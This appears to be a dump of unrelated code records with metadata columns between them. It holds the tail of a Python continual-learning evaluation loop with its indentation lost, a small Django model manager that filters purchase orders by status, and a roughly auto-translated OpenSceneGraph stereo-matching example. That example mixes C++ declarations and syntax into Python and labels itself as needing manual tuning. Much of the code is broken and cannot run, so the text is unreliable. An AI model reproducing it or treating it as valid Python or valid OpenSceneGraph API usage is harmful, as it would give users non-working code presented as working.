if args.vis:
model.pick_sample_images(x_test[0][0], y_test[0][0])
# for each incremental phase
for phase in range(args.start_phase-1, num_phases):
class_tasks = tasks_set[phase]
# train from unlabeled data
print('Phase ' + str(phase+1) + ':')
print('Learning from data stream...')
print('Class Distribution {}'.format(np.bincount(y_train[phase], minlength=num_classes)))
print(model.layers[0].im_seen)
model.train(x_train[phase], y_train[phase], phase+1, train_params)
save_checkpoint(results, model, trial, phase, args.log, args.dataset)
# do not always have task to evaluate
if len(class_tasks) > 0:
# reset stored classification info
model.setTask(args.ntp, len(np.unique(class_tasks[0])))
# for num_tasks time (number tasks per phase)
for sample in range(args.ntp):
# Show eval sample number
print(' Sample ' + str(sample+1) + '/' + str(args.ntp))
# labeled data (supervision)
x_supervise = x_test[sample][1]
y_supervise = y_test[sample][1]
# querry data (evaluation)
x_query = x_test[sample][0]
y_query = y_test[sample][0]
# for all tasks
for ti, task in enumerate(class_tasks):
# get tasks (i.e. classes for classification task)
t_string = tasks_string[ti]
# get task labeled data and eval data
x_query_t = x_query[np.isin(y_query, task)]
y_query_t = y_query[np.isin(y_query, task)].astype(int)
x_supervise_t = x_supervise[np.isin(y_supervise, task)]
y_supervise_t = y_supervise[np.isin(y_supervise, task)].astype(int)
print('Task: ' + str(task))
print('Total Labeled Examples Per Class ' + str(np.bincount(y_supervise_t, minlength=num_classes)))
print('Total Test Examples Per Class ' + str(np.bincount(y_query_t, minlength=num_classes)))
# supervision
print(' Showing supervision...')
model.supervise(x_supervise_t, y_supervise_t, phase,
supervise_params, l_list=l_eval, index=sample)
# Percent of class informative centroids
if args.model_name == 'stam':
ci_score, ci_score_pc, multi_ci = model.get_ci(phase, sample, args.vis)
results['class_informative'][trial, sample, phase, ti, :] = ci_score
results['class_informative_pc'][trial, sample, phase, ti, :, :] = ci_score_pc
results['class_informative_multi'][trial, sample, phase, ti, :] = multi_ci
if args.vis and args.model_name == 'stam':
model.detailed_classification_plots()
# classification and evalution
print(' Eval Task: ' + t_string)
print(' Classifying...')
confusion_matrices = np.zeros((len(classifiers), num_classes, num_classes))
for ci, classifier in enumerate(classifiers):
# Weakly supervised predictions
y_predict = model.classify(x_query_t, phase, classifier,
sample, classify_params).astype(int)
# Calculate Confusion Matrix for Predictions
if args.vis and sample == 0:
for cf in range(len(y_predict)):
confusion_matrices[ci, int(y_query_t[cf]), int(y_predict[cf])] += 1
plt.imshow(confusion_matrices[0], cmap='hot', interpolation='nearest')
plt.ylabel("True Class")
plt.xlabel("Predicted Class")
plt.xticks(np.arange(num_classes))
plt.yticks(np.arange(num_classes))
for i in range(num_classes):
for j in range(num_classes):
text = plt.text(j, i, confusion_matrices[0, i, j], ha="center", va="center", color="w")
plt.savefig(smart_dir(model.plot_directory + '/phase_{}/'.format(phase)) + 'confusion_matrix.png')
plt.close()
# all class results
score = 100 * np.mean(y_query_t == y_predict)
print(' ' + classifier + ': ' \
+ str(score) + '%')
if args.model_name == 'stam':
print(' ' + classifier + ': ' \
+ str(ci_score), ' % class informative')
print(' ' + classifier + ': ' \
+ str(multi_ci), ' % class informative - more than 1')
# per class results
score_pc = [100 * np.mean(y_query_t[np.where(y_query_t == k)] \
== y_predict[np.where(y_query_t == k)]) for k in task]
results['classification_accuracy'][trial, sample, phase, ti, ci] = score
results['classification_accuracy_pc'][trial, sample, phase, ti, ci, :len(task)] = score_pc
for ci, cluster_method in enumerate(clustering_models):
acc, pc_acc = model.cluster(x_query_t, y_query_t, phase,
sample, args.dataset, num_classes,
cluster_params[ci],
cluster_method, eval_layers=l_eval)
print(' ' + cluster_method + ': ' \
+ str(acc) + '%')
results['clustering_acc'][trial, sample, phase, ti, ci] = acc
results['clustering_acc_pc'][trial, sample, phase, ti, ci, :] = pc_acc
if args.model_name == 'stam':
results['ltm_growth'] = [model.layers[0].ltm_history, model.layers[1].ltm_history, model.layers[2].ltm_history]
return results
if __name__ == "__main__":
trial = 0
plt.rc('image', cmap='gray')
parser = TrainParser()
args = parser.parse()
if args.model_name == 'stam':
configs = load_stam_configs(args)
if args.model_name == 'gem':
configs = load_gem_configs(args)
if args.model_name == 'mas':
configs = load_mas_configs(args)
# load dataset
(x_, y_), (x_eval, y_eval), configs = load_dataset(configs, args)
stream, configs = form_datastream(args.schedule_flag, configs)
# Result storage init
results = {}
results['classification_accuracy'] = -1 * np.ones((configs['num_trials'],
configs['num_samples'],
configs['num_phases'],
configs['num_tasks'],
configs['num_classifiers'],
))
results['classification_accuracy_pc'] = -1 * np.ones((configs['num_trials'],
configs['num_samples'],
configs['num_phases'],
configs['num_tasks'],
configs['num_classifiers'],
configs['num_classes']
))
results['clustering_acc'] = -1 * np.ones((configs['num_trials'],
configs['num_samples'],
configs['num_phases'],
configs['num_tasks'],
configs['num_cluster_models'],
))
results['clustering_acc_pc'] = -1 * np.ones((configs['num_trials'],
configs['num_samples'],
configs['num_phases'],
configs['num_tasks'],
configs['num_cluster_models'],
configs['num_classes']
))
results['task_3_acc'] = -1 * np.ones((configs['num_trials'],
configs['num_samples'],
configs['num_phases'],
configs['num_tasks'],
))
results['task_3_acc_pc'] = -1 * np.ones((configs['num_trials'],
configs['num_samples'],
configs['num_phases'],
configs['num_tasks'],
configs['num_classes']
))
if args.model_name == 'stam':
results['class_informative'] = -1 * np.ones((configs['num_trials'],
configs['num_samples'],
configs['num_phases'],
configs['num_tasks'],
configs['num_layers']
))
results['class_informative_pc'] = -1 * np.ones((configs['num_trials'],
configs['num_samples'],
configs['num_phases'],
configs['num_tasks'],
configs['num_layers'],
configs['num_classes']
))
results['class_informative_multi'] = -1 * np.ones((configs['num_trials'],
configs['num_samples'],
configs['num_phases'],
configs['num_tasks'],
configs['num_layers']
))
# save parameters
parser.save_args(smart_dir('logs/' + args.log + '/' + args.dataset) + 'user_settings.yml')
save_file = smart_dir('logs/' + args.log) + 'training_configs.yml'
with open(save_file, 'w') as yaml_file:
yaml.dump(configs, yaml_file)
if args.train_only:
print("Training Only")
for trial in range(args.ntrials):
run_train(results, trial, args, configs)
elif args.test_only:
print("Testing Only")
for trial in range(args.start_trial - 1, args.ntrials):
results = run_test(args.load_log, trial, results, args, configs)
elif args.train_test:
print("Full Trial")
for trial in range(args.start_trial-1, args.ntrials):
results = run_trial(trial, results, args, configs)
with open(configs['results_directory'] + 'results.pkl', 'wb') as handle:
pickle.dump(results, handle, protocol=pickle.HIGHEST_PROTOCOL)
| 41.892922
| 126
| 0.485292
| 2,258
| 23,083
| 4.738707
| 0.104517
| 0.049533
| 0.021869
| 0.02243
| 0.855888
| 0.84271
| 0.829626
| 0.820748
| 0.820748
| 0.820748
| 0
| 0.005432
| 0.401854
| 23,083
| 550
| 127
| 41.969091
| 0.769537
| 0.063207
| 0
| 0.801749
| 0
| 0
| 0.124368
| 0.023928
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008746
| false
| 0
| 0.049563
| 0
| 0.06414
| 0.125364
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
512f9407a56e601e341f9aa5d0f7314a747952a4
| 1,284
|
py
|
Python
|
forms/managers.py
|
yusufom/ERP
|
a1844d0ece0ab5fff748d75a3ac7a2a963e56576
|
[
"Unlicense"
] | null | null | null |
forms/managers.py
|
yusufom/ERP
|
a1844d0ece0ab5fff748d75a3ac7a2a963e56576
|
[
"Unlicense"
] | null | null | null |
forms/managers.py
|
yusufom/ERP
|
a1844d0ece0ab5fff748d75a3ac7a2a963e56576
|
[
"Unlicense"
] | null | null | null |
from django.db import models
import datetime
class POManager(models.Manager):
def get_queryset(self):
return super().get_queryset()
def all_pending_po(self):
return super().get_queryset().filter(status = 'Pending').order_by('-created')# applying FIFO
def all_cancel_po(self):
return super().get_queryset().filter(status = 'Cancelled').order_by('-created')
def all_rejected_po(self):
return super().get_queryset().filter(status = 'Rejected').order_by('-created')
def all_approved_po(self):
return super().get_queryset().filter(status = 'Approved')
def current_year_leaves(self):
return super().get_queryset().filter(startdate__year = datetime.date.today().year)
class RFManager(models.Manager):
def get_queryset(self):
return super().get_queryset()
def all_pending_po(self):
return super().get_queryset().filter(status = 'Pending').order_by('-created')# applying FIFO
def all_cancel_po(self):
return super().get_queryset().filter(status = 'Cancelled').order_by('-created')
def all_rejected_po(self):
return super().get_queryset().filter(status = 'Rejected').order_by('-created')
def all_approved_po(self):
return super().get_queryset().filter(status = 'Approved')
| 24.692308
| 101
| 0.69704
| 165
| 1,284
| 5.187879
| 0.218182
| 0.167056
| 0.192757
| 0.231308
| 0.859813
| 0.859813
| 0.82243
| 0.82243
| 0.82243
| 0.82243
| 0
| 0
| 0.153427
| 1,284
| 51
| 102
| 25.176471
| 0.787489
| 0.021807
| 0
| 0.769231
| 0
| 0
| 0.089457
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.423077
| false
| 0
| 0.076923
| 0.423077
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 12
|
5aba024208a465010284c738dc5bd141dc5a8720
| 35,975
|
py
|
Python
|
examples/rough_translated1/osgstereomatch.py
|
JaneliaSciComp/osgpyplusplus
|
a5ae3f69c7e9101a32d8cc95fe680dab292f75ac
|
[
"BSD-3-Clause"
] | 17
|
2015-06-01T12:19:46.000Z
|
2022-02-12T02:37:48.000Z
|
examples/rough_translated1/osgstereomatch.py
|
cmbruns/osgpyplusplus
|
f8bfca2cf841e15f6ddb41c958f3ad0d0b9e4b75
|
[
"BSD-3-Clause"
] | 7
|
2015-07-04T14:36:49.000Z
|
2015-07-23T18:09:49.000Z
|
examples/rough_translated1/osgstereomatch.py
|
cmbruns/osgpyplusplus
|
f8bfca2cf841e15f6ddb41c958f3ad0d0b9e4b75
|
[
"BSD-3-Clause"
] | 7
|
2015-11-28T17:00:31.000Z
|
2020-01-08T07:00:59.000Z
|
#!/bin/env python
# Automatically translated python version of
# OpenSceneGraph example program "osgstereomatch"
# !!! This program will need manual tuning before it will work. !!!
import sys
from osgpypp import osg
from osgpypp import osgDB
from osgpypp import osgViewer
# Translated from file 'osgstereomatch.cpp'
# OpenSceneGraph example, osgstereomatch.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include <osg/Vec3>
#include <osg/Vec4>
#include <osg/Quat>
#include <osg/Matrix>
#include <osg/ShapeDrawable>
#include <osg/Geometry>
#include <osg/Geode>
#include <osg/TextureRectangle>
#include <osgDB/FileUtils>
#include <osgDB/ReadFile>
#include <osgViewer/Viewer>
#include <osgViewer/ViewerEventHandlers>
#include <iostream>
#include "StereoPass.h"
#include "StereoMultipass.h"
def createScene(left, right, min_disp, max_disp, window_size, single_pass):
width = left.s()
height = left.t()
topnode = osg.Group()
# create four quads so we can display up to four images
geode = osg.Geode()
# each geom will contain a quad
da = osg.DrawArrays(osg.PrimitiveSet.QUADS,0,4)
colors = osg.Vec4Array()
colors.push_back(osg.Vec4(1.0,1.0,1.0,1.0))
tcoords = osg.Vec2Array() # texture coords
tcoords.push_back(osg.Vec2(0, 0))
tcoords.push_back(osg.Vec2(width, 0))
tcoords.push_back(osg.Vec2(width, height))
tcoords.push_back(osg.Vec2(0, height))
osg.StateSet geomss[4] # stateset where we can attach textures
osg.TextureRectangle texture[4]
for (int i=0i<4i++)
vcoords = osg.Vec3Array() # vertex coords
geom = osg.Geometry()
# tile the quads on the screen
# 2 3
# 0 1
int xoff, zoff
xoff = (i%2)
zoff = 1 if (i>1) else 0
# initial viewer camera looks along y
vcoords.push_back(osg.Vec3d(0+(xoff * width), 0, 0+(zoff * height)))
vcoords.push_back(osg.Vec3d(width+(xoff * width), 0, 0+(zoff * height)))
vcoords.push_back(osg.Vec3d(width+(xoff * width), 0, height+(zoff * height)))
vcoords.push_back(osg.Vec3d(0+(xoff * width), 0, height+(zoff * height)))
geom.setVertexArray(vcoords)
geom.setTexCoordArray(0,tcoords)
geom.addPrimitiveSet(da)
geom.setColorArray(colors, osg.Array.BIND_OVERALL)
geomss[i] = geom.getOrCreateStateSet()
geomss[i].setMode(GL_LIGHTING, osg.StateAttribute.OFF)
texture[i] = osg.TextureRectangle()
texture[i].setResizeNonPowerOfTwoHint(False)
texture[i].setFilter(osg.Texture.MIN_FILTER, osg.Texture.LINEAR)
texture[i].setFilter(osg.Texture.MAG_FILTER, osg.Texture.LINEAR)
geode.addDrawable(geom)
# attach the input images to the bottom textures of the view
texture[0].setImage(left)
texture[1].setImage(right)
geomss[0].setTextureAttributeAndModes(0, texture[0], osg.StateAttribute.ON)
geomss[1].setTextureAttributeAndModes(0, texture[1], osg.StateAttribute.ON)
topnode.addChild(geode)
# create the processing passes
if single_pass :
stereopass = StereoPass(texture[0], texture[1],
width, height,
min_disp, max_disp, window_size)
topnode.addChild(stereopass.getRoot())
# attach the output of the processing to the top left geom
geomss[2].setTextureAttributeAndModes(0,
stereopass.getOutputTexture(),
osg.StateAttribute.ON)
else:
stereomp = StereoMultipass(texture[0], texture[1],
width, height,
min_disp, max_disp, window_size)
topnode.addChild(stereomp.getRoot())
# attach the output of the processing to the top left geom
geomss[2].setTextureAttributeAndModes(0,
stereomp.getOutputTexture(),
osg.StateAttribute.ON)
return topnode
int main(int argc, char *argv[])
# use an ArgumentParser object to manage the program arguments.
arguments = osg.ArgumentParser(argv)
# set up the usage document, in case we need to print out how to use this program.
arguments.getApplicationUsage().setDescription(arguments.getApplicationName()+" is the example which demonstrates a stereo matching algorithm. It uses multiple render targets and multiple passes with texture ping-pong.")
arguments.getApplicationUsage().setCommandLineUsage(arguments.getApplicationName()+" [options] --left left_image --right right_image --min min_disparity --max max_disparity --window window_size")
arguments.getApplicationUsage().addCommandLineOption("-h or --help","Display this information")
arguments.getApplicationUsage().addCommandLineOption("--left","The left image of the stereo pair to load.")
arguments.getApplicationUsage().addCommandLineOption("--right","The right image of the stereo pair to load.")
arguments.getApplicationUsage().addCommandLineOption("--min","The minimum disparity to start matching pixels.")
arguments.getApplicationUsage().addCommandLineOption("--max","The maximum disparity to stop matching pixels.")
arguments.getApplicationUsage().addCommandLineOption("--window","The window size used to match areas around pixels.")
arguments.getApplicationUsage().addCommandLineOption("--single","Use a single pass instead on multiple passes.")
# if user request help write it out to cout.
if arguments.read("-h") or arguments.read("--help") :
arguments.getApplicationUsage().write(std.cout)
return 1
leftName = str("")
while arguments.read("--left", leftName) :
rightName = str("")
while arguments.read("--right", rightName) :
minDisparity = 0
while arguments.read("--min", minDisparity) :
maxDisparity = 31
while arguments.read("--max", maxDisparity) :
windowSize = 5
while arguments.read("--window", windowSize) :
useSinglePass = False
while arguments.read("--single") : useSinglePass = True
if leftName == "" or rightName=="" :
arguments.getApplicationUsage().write(std.cout)
return 1
# load the images
leftIm = osgDB.readImageFile(leftName)
rightIm = osgDB.readImageFile(rightName)
scene = createScene(leftIm, rightIm, minDisparity, maxDisparity, windowSize, useSinglePass)
# construct the viewer.
viewer = osgViewer.Viewer()
viewer.setThreadingModel(osgViewer.Viewer.SingleThreaded)
# add the stats handler
viewer.addEventHandler(osgViewer.StatsHandler)()
viewer.setSceneData(scene)
return viewer.run()
# Translated from file 'StereoMultipass.cpp'
# -*- Mode: C++ tab-width: 4 indent-tabs-mode: t c-basic-offset: 4 -*-
# OpenSceneGraph example, osgstereomatch.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include "StereoMultipass.h"
#include <osgDB/FileUtils>
#include <iostream>
SubtractPass.SubtractPass(osg.TextureRectangle *left_tex,
osg.TextureRectangle *right_tex,
int width, int height,
int start_disparity) :
_TextureWidth(width),
_TextureHeight(height),
_StartDisparity(start_disparity)
_RootGroup = osg.Group()
_InTextureLeft = left_tex
_InTextureRight = right_tex
createOutputTextures()
_Camera = osg.Camera()
setupCamera()
_Camera.addChild(createTexturedQuad())
_RootGroup.addChild(_Camera)
setShader("shaders/stereomatch_subtract.frag")
SubtractPass.~SubtractPass()
osg.Group SubtractPass.createTexturedQuad()
top_group = osg.Group()
quad_geode = osg.Geode()
quad_coords = osg.Vec3Array() # vertex coords
# counter-clockwise
quad_coords.push_back(osg.Vec3d(0, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 1, -1))
quad_coords.push_back(osg.Vec3d(0, 1, -1))
quad_tcoords = osg.Vec2Array() # texture coords
quad_tcoords.push_back(osg.Vec2(0, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, _TextureHeight))
quad_tcoords.push_back(osg.Vec2(0, _TextureHeight))
quad_geom = osg.Geometry()
quad_da = osg.DrawArrays(osg.PrimitiveSet.QUADS,0,4)
quad_colors = osg.Vec4Array()
quad_colors.push_back(osg.Vec4(1.0,1.0,1.0,1.0))
quad_geom.setVertexArray(quad_coords)
quad_geom.setTexCoordArray(0, quad_tcoords)
quad_geom.addPrimitiveSet(quad_da)
quad_geom.setColorArray(quad_colors, osg.Array.BIND_OVERALL)
_StateSet = quad_geom.getOrCreateStateSet()
_StateSet.setMode(GL_LIGHTING,osg.StateAttribute.OFF)
_StateSet.setTextureAttributeAndModes(0, _InTextureLeft, osg.StateAttribute.ON)
_StateSet.setTextureAttributeAndModes(1, _InTextureRight, osg.StateAttribute.ON)
_StateSet.addUniform(osg.Uniform("textureLeft", 0))
_StateSet.addUniform(osg.Uniform("textureRight", 1))
_StateSet.addUniform(osg.Uniform("start_disparity", _StartDisparity))
quad_geode.addDrawable(quad_geom)
top_group.addChild(quad_geode)
return top_group
void SubtractPass.setupCamera()
# clearing
_Camera.setClearColor(osg.Vec4(0.1,0.1,0.3,1.0))
_Camera.setClearMask(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# projection and view
_Camera.setProjectionMatrix(osg.Matrix.ortho2D(0,1,0,1))
_Camera.setReferenceFrame(osg.Transform.ABSOLUTE_RF)
_Camera.setViewMatrix(osg.Matrix.identity())
# viewport
_Camera.setViewport(0, 0, _TextureWidth, _TextureHeight)
_Camera.setRenderOrder(osg.Camera.PRE_RENDER)
_Camera.setRenderTargetImplementation(osg.Camera.FRAME_BUFFER_OBJECT)
# attach the 4 textures
for (int i=0 i<4 i++)
_Camera.attach(osg.Camera.BufferComponent(osg.Camera.COLOR_BUFFER0+i), _OutTexture[i])
void SubtractPass.createOutputTextures()
for (int i=0 i<4 i++)
_OutTexture[i] = osg.TextureRectangle()
_OutTexture[i].setTextureSize(_TextureWidth, _TextureHeight)
_OutTexture[i].setInternalFormat(GL_RGBA)
_OutTexture[i].setFilter(osg.Texture2D.MIN_FILTER,osg.Texture2D.LINEAR)
_OutTexture[i].setFilter(osg.Texture2D.MAG_FILTER,osg.Texture2D.LINEAR)
void SubtractPass.setShader(str filename)
fshader = osg.Shader( osg.Shader.FRAGMENT )
fshader.loadShaderSourceFromFile(osgDB.findDataFile(filename))
_FragmentProgram = 0
_FragmentProgram = osg.Program()
_FragmentProgram.addShader(fshader)
_StateSet.setAttributeAndModes(_FragmentProgram, osg.StateAttribute.ON | osg.StateAttribute.OVERRIDE )
#XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
AggregatePass.AggregatePass(osg.TextureRectangle *diff_tex0,
osg.TextureRectangle *diff_tex1,
osg.TextureRectangle *diff_tex2,
osg.TextureRectangle *diff_tex3,
osg.TextureRectangle *agg_tex_in,
osg.TextureRectangle *agg_tex_out,
int width, int height,
int start_disparity, int window_size):
_TextureWidth(width),
_TextureHeight(height),
_StartDisparity(start_disparity),
_WindowSize(window_size)
_RootGroup = osg.Group()
_InTextureDifference[0] = diff_tex0
_InTextureDifference[1] = diff_tex1
_InTextureDifference[2] = diff_tex2
_InTextureDifference[3] = diff_tex3
_InTextureAggregate = agg_tex_in
_OutTextureAggregate = agg_tex_out
_OutTexture = _OutTextureAggregate
_Camera = osg.Camera()
setupCamera()
_Camera.addChild(createTexturedQuad())
_RootGroup.addChild(_Camera)
setShader("shaders/stereomatch_aggregate.frag")
AggregatePass.~AggregatePass()
osg.Group AggregatePass.createTexturedQuad()
top_group = osg.Group()
quad_geode = osg.Geode()
quad_coords = osg.Vec3Array() # vertex coords
# counter-clockwise
quad_coords.push_back(osg.Vec3d(0, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 1, -1))
quad_coords.push_back(osg.Vec3d(0, 1, -1))
quad_tcoords = osg.Vec2Array() # texture coords
quad_tcoords.push_back(osg.Vec2(0, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, _TextureHeight))
quad_tcoords.push_back(osg.Vec2(0, _TextureHeight))
quad_geom = osg.Geometry()
quad_da = osg.DrawArrays(osg.PrimitiveSet.QUADS,0,4)
quad_colors = osg.Vec4Array()
quad_colors.push_back(osg.Vec4(1.0,1.0,1.0,1.0))
quad_geom.setVertexArray(quad_coords)
quad_geom.setTexCoordArray(0, quad_tcoords)
quad_geom.addPrimitiveSet(quad_da)
quad_geom.setColorArray(quad_colors, osg.Array.BIND_OVERALL)
_StateSet = quad_geom.getOrCreateStateSet()
_StateSet.setMode(GL_LIGHTING,osg.StateAttribute.OFF)
_StateSet.setTextureAttributeAndModes(0, _InTextureDifference[0], osg.StateAttribute.ON)
_StateSet.setTextureAttributeAndModes(1, _InTextureDifference[1], osg.StateAttribute.ON)
_StateSet.setTextureAttributeAndModes(2, _InTextureDifference[2], osg.StateAttribute.ON)
_StateSet.setTextureAttributeAndModes(3, _InTextureDifference[3], osg.StateAttribute.ON)
_StateSet.setTextureAttributeAndModes(4, _InTextureAggregate, osg.StateAttribute.ON)
_StateSet.addUniform(osg.Uniform("textureDiff0", 0))
_StateSet.addUniform(osg.Uniform("textureDiff1", 1))
_StateSet.addUniform(osg.Uniform("textureDiff2", 2))
_StateSet.addUniform(osg.Uniform("textureDiff3", 3))
_StateSet.addUniform(osg.Uniform("textureAggIn", 4))
_StateSet.addUniform(osg.Uniform("start_disparity", _StartDisparity))
_StateSet.addUniform(osg.Uniform("window_size", _WindowSize))
quad_geode.addDrawable(quad_geom)
top_group.addChild(quad_geode)
return top_group
void AggregatePass.setupCamera()
# clearing
_Camera.setClearColor(osg.Vec4(0.1,0.1,0.3,1.0))
_Camera.setClearMask(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# projection and view
_Camera.setProjectionMatrix(osg.Matrix.ortho2D(0,1,0,1))
_Camera.setReferenceFrame(osg.Transform.ABSOLUTE_RF)
_Camera.setViewMatrix(osg.Matrix.identity())
# viewport
_Camera.setViewport(0, 0, _TextureWidth, _TextureHeight)
_Camera.setRenderOrder(osg.Camera.PRE_RENDER)
_Camera.setRenderTargetImplementation(osg.Camera.FRAME_BUFFER_OBJECT)
_Camera.attach(osg.Camera.BufferComponent(osg.Camera.COLOR_BUFFER0+0), _OutTexture)
void AggregatePass.setShader(str filename)
fshader = osg.Shader( osg.Shader.FRAGMENT )
fshader.loadShaderSourceFromFile(osgDB.findDataFile(filename))
_FragmentProgram = 0
_FragmentProgram = osg.Program()
_FragmentProgram.addShader(fshader)
_StateSet.setAttributeAndModes(_FragmentProgram, osg.StateAttribute.ON | osg.StateAttribute.OVERRIDE )
# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
SelectPass.SelectPass(osg.TextureRectangle *in_tex,
int width, int height,
int min_disparity, int max_disparity) :
_TextureWidth(width),
_TextureHeight(height),
_MinDisparity(min_disparity),
_MaxDisparity(max_disparity)
_RootGroup = osg.Group()
_InTexture = in_tex
createOutputTextures()
_Camera = osg.Camera()
setupCamera()
_Camera.addChild(createTexturedQuad())
_RootGroup.addChild(_Camera)
setShader("shaders/stereomatch_select.frag")
SelectPass.~SelectPass()
osg.Group SelectPass.createTexturedQuad()
top_group = osg.Group()
quad_geode = osg.Geode()
quad_coords = osg.Vec3Array() # vertex coords
# counter-clockwise
quad_coords.push_back(osg.Vec3d(0, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 1, -1))
quad_coords.push_back(osg.Vec3d(0, 1, -1))
quad_tcoords = osg.Vec2Array() # texture coords
quad_tcoords.push_back(osg.Vec2(0, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, _TextureHeight))
quad_tcoords.push_back(osg.Vec2(0, _TextureHeight))
quad_geom = osg.Geometry()
quad_da = osg.DrawArrays(osg.PrimitiveSet.QUADS,0,4)
quad_colors = osg.Vec4Array()
quad_colors.push_back(osg.Vec4(1.0,1.0,1.0,1.0))
quad_geom.setVertexArray(quad_coords)
quad_geom.setTexCoordArray(0, quad_tcoords)
quad_geom.addPrimitiveSet(quad_da)
quad_geom.setColorArray(quad_colors, osg.Array.BIND_OVERALL)
_StateSet = quad_geom.getOrCreateStateSet()
_StateSet.setMode(GL_LIGHTING,osg.StateAttribute.OFF)
_StateSet.setTextureAttributeAndModes(0, _InTexture, osg.StateAttribute.ON)
_StateSet.addUniform(osg.Uniform("textureIn", 0))
_StateSet.addUniform(osg.Uniform("min_disparity", _MinDisparity))
_StateSet.addUniform(osg.Uniform("max_disparity", _MaxDisparity))
quad_geode.addDrawable(quad_geom)
top_group.addChild(quad_geode)
return top_group
void SelectPass.setupCamera()
# clearing
_Camera.setClearColor(osg.Vec4(0.1,0.1,0.3,1.0))
_Camera.setClearMask(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# projection and view
_Camera.setProjectionMatrix(osg.Matrix.ortho2D(0,1,0,1))
_Camera.setReferenceFrame(osg.Transform.ABSOLUTE_RF)
_Camera.setViewMatrix(osg.Matrix.identity())
# viewport
_Camera.setViewport(0, 0, _TextureWidth, _TextureHeight)
_Camera.setRenderOrder(osg.Camera.PRE_RENDER)
_Camera.setRenderTargetImplementation(osg.Camera.FRAME_BUFFER_OBJECT)
_Camera.attach(osg.Camera.BufferComponent(osg.Camera.COLOR_BUFFER0+0), _OutTexture)
void SelectPass.createOutputTextures()
_OutTexture = osg.TextureRectangle()
_OutTexture.setTextureSize(_TextureWidth, _TextureHeight)
_OutTexture.setInternalFormat(GL_RGBA)
_OutTexture.setFilter(osg.Texture2D.MIN_FILTER,osg.Texture2D.LINEAR)
_OutTexture.setFilter(osg.Texture2D.MAG_FILTER,osg.Texture2D.LINEAR)
void SelectPass.setShader(str filename)
fshader = osg.Shader( osg.Shader.FRAGMENT )
fshader.loadShaderSourceFromFile(osgDB.findDataFile(filename))
_FragmentProgram = 0
_FragmentProgram = osg.Program()
_FragmentProgram.addShader(fshader)
_StateSet.setAttributeAndModes(_FragmentProgram, osg.StateAttribute.ON | osg.StateAttribute.OVERRIDE )
# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
StereoMultipass.StereoMultipass(osg.TextureRectangle *left_tex,
osg.TextureRectangle *right_tex,
int width, int height,
int min_disparity, int max_disparity, int window_size) :
_TextureWidth(width),
_TextureHeight(height)
_RootGroup = osg.Group()
createOutputTextures()
_Camera = osg.Camera()
setupCamera()
_Camera.addChild(createTexturedQuad())
_RootGroup.addChild(_Camera)
